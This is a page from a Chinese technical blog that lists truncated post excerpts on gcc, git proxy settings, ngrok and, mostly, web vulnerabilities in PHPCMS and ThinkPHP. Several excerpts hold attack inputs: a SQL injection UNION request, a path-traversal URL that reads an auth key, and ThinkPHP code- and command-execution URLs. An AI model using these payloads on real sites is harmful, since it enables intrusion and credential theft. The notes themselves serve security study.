上一页 1 2 3 4 5 6 ··· 33 下一页
摘要: 1.gcc是GNU Compiler Collection(就是GNU编译器套件),也可以简单认为是编译器,它可以编译很多种编程语言(括C、C++、Objective-C、Fortran、Java等等)。2.当你的程序只有一个源文件时,直接就可以用gcc命令编译它。3.但是当你的程序包含很多个源文件 阅读全文
posted @ 2020-09-22 16:57 方方和圆圆 阅读(2230) 评论(1) 推荐(2) 编辑
摘要: git config --global --unset http.proxy git config --global --unset https.proxy npm config delete proxy git config --global http.proxy 'socks5://127.0. 阅读全文
posted @ 2020-09-07 13:59 方方和圆圆 阅读(656) 评论(0) 推荐(0) 编辑
摘要: GET /down.php/1' UNION select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 -- --/bb HTTP/1.1Host: yyy.xxx.cnConnection: keep-aliveCache-Co 阅读全文
posted @ 2020-06-03 16:53 方方和圆圆 阅读(401) 评论(1) 推荐(0) 编辑
摘要: A:硬件设备: 阿里云主机 cent OS 7 X64 局域网机器:win 10(用来部署 http代理服务器) , ngrok的客户机 另外一台机器,任何系统都可以: 配置代理地址, 实现匿名上网 可以配置域名解析的域名一个 B:搭建ngrox服务器, 可以参考:自建 ngrok 内网穿透服务 配 阅读全文
posted @ 2020-05-02 11:26 方方和圆圆 阅读(22) 评论(0) 推荐(1) 编辑
摘要: 11 <?php /** * 字符串加密、解密函数 * * * @param string $txt 字符串 * @param string $operation ENCODE为加密,DECODE为解密,可选参数,默认为ENCODE, * @param string $key 密钥:数字、字母、下划 阅读全文
posted @ 2020-03-22 13:28 方方和圆圆 阅读(402) 评论(0) 推荐(1) 编辑
摘要: 当注入点在json格式数据中时,SQLMAP可能会犯傻,导致找不到注入点,使用-p指定参数又不好指定json格式中的字段, 这个时候就需要人工修改一下注入的json数据,使SQLMAP能够找到注入参数,导致SQLMAP犯傻的json输入类似如下: {"name":["string"]} 将其修改为以 阅读全文
posted @ 2020-03-18 13:24 方方和圆圆 阅读(4548) 评论(0) 推荐(0) 编辑
摘要: 漏洞分析 文件路径: /phpcms/modules/member/index.php public function change_credit() { $memberinfo = $this->memberinfo; //加载用户模块配置 $member_setting = getcache(' 阅读全文
posted @ 2020-03-07 00:20 方方和圆圆 阅读(813) 评论(0) 推荐(1) 编辑
摘要: 获取key 通过文件包含漏洞读取phpsso_auth_key (9.5.7中招,v9.6.0没有此漏洞): /api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\ 阅读全文
posted @ 2020-03-06 16:18 方方和圆圆 阅读(1110) 评论(0) 推荐(0) 编辑
摘要: 漏洞详情 install/install.php 184行 if($module == 'admin') { $cookiepre = random(5, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ').''; $authkey = r 阅读全文
posted @ 2020-03-05 16:17 方方和圆圆 阅读(1152) 评论(0) 推荐(0) 编辑
摘要: thinkphp5.1.1为例 1、代码执行: http://192.168.0.108/public//index.php?s=index/\think\Request/input&filter=phpinfo&data=1 2、命令执行: http://192.168.0.108/public/ 阅读全文
posted @ 2020-02-28 16:59 方方和圆圆 阅读(5438) 评论(0) 推荐(0) 编辑
上一页 1 2 3 4 5 6 ··· 33 下一页

再过一百年, 我会在哪里?